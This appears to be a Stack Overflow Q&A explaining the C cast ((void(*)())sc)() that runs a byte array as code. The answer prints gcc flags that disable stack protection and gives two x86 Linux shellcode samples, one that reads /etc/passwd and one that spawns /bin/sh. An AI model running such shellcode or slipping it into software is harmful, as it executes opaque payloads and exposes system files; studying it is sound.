# what does (void(*)() sc) () mean?

Tags: c++, c

```
unsigned char sc[] =
```

(some long binary string)

```
int main()
{
    ((void(*)())sc)();
    return 0;
}
```

what does what does `(void(*)() sc) ()` mean in here?
I saw " `*void(*)()` means a void function that takes no argument" in StackoverFlow.
`
I have three question

First,
As this comment above, I think above code has to "`*`" ahead of `void(*)`.
However, without pointer "*" , it is working well.

Second, "`void(*)()` sc is wrapped by `()()`, such like `(void(*)() sc)()`.
there is twice use of "`()`"

Third, why is it working??  Common,When we call a function, we usually write only name of function, such as funtion1(a , b);
"`(void(*)() sc )()`" is just initialize!!
So i think sc is not used yet. However it is working well.

Comment: Define "*working*". The code invokes undefined behavior in both languages you tagged, and will fail in environments that prevent code execution from data areas.

Comment: **Warning**: Do not not execute this code until verified it is harmless.  Post flagged.

Comment: Looks like trying to overflow with malicious code

Comment: deleted the unaudited binary code.  See edit histosy if you want it.  If you want it back, please talk to a moderator.

Comment: sorry i really didnt know that ... thank you for hiding the binary code instead of me

Comment: and thanks for editing my post for fixing grammer

Answer (score 3):

This is a trick to execute any shellcode inside your main.

Let's analyze it together shall we ? (The function declaration, not your shellcode):

```
(void(*)() sc ) ();
```

First lets talk about sc. `sc` is a byte array being assigned a shellcode, meaning that anything can happen (hence why it was rightfully edited).

Then it is converted into a function, a function ptr to be exact:

```
void(*)() sc
```

With void(*)() you simply cast your shellcode as a function pointer, meaning that if we call this function ptr, taking no argument as you noticed, it will point to the first byte of your unsigned char array. The compiler will interpret your char array as raw bytes to be converted into machine code.

*NB: an unsigned char is a byte.*

Finally the trailing `();` ask the function, wrapped by parenthesis, to be executed, as soon as you start your program.

In short it is a convenient way to tell eip, the register that hold the address of program's next execution, to point at your byte array and easily test different shellcodes.

Note that, as mentioned by dxiv, this will not work in environment that prevent code execution from data area as your function ptr points to a data segment.

If you want to make it work you will need to compile with the following flags in order to enable exacstack `-z execstack`, and potentially `-fno-stack-protector` as well as `-m32` if it is a shellcode for 32 bits:

```
gcc -m32 -fno-stack-protector -z execstack shellcode.c && ./a.out
```

Example to read /etc/passwd (linux):

```
unsigned char sc[] =

  "\x31\xc9"
  "\xf7"
  "\xe1\xb0"
      "\x05"
  "\x51\x68"

"\x73\x73\x77"
    "\x64"
    "\x68"
    "\x63"

"\x2f\x70\x61"
"\x68"  "\x2f"
"\x2f\x65\x74"
"\x89"   "\xe3"

"\xcd\x80\x93"
"\x91"
"\xb0"
"\x03\x31\xd2"

"\x66"    "\xba"
"\xff\x0f\x42"
"\xcd""\x80"
"\x92"    "\x31"

"\xc0\xb0\x04"
"\xb3"  "\x01"
"\xcd"  "\x80"
"\x93\xcd\x80";


int main()
{
    ((void(*)())sc)();
    return 0;
}
```

---

Another example to open a shell:

```c
#include <unistd.h>

unsigned char sc[] =
"\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80";

int main()
{
    ((void(*)())sc)();
    return 0;
}
```

Comment: so there are initialize and use in instruction," ((void(*)())sc)()"

Comment: 마자요 It is exact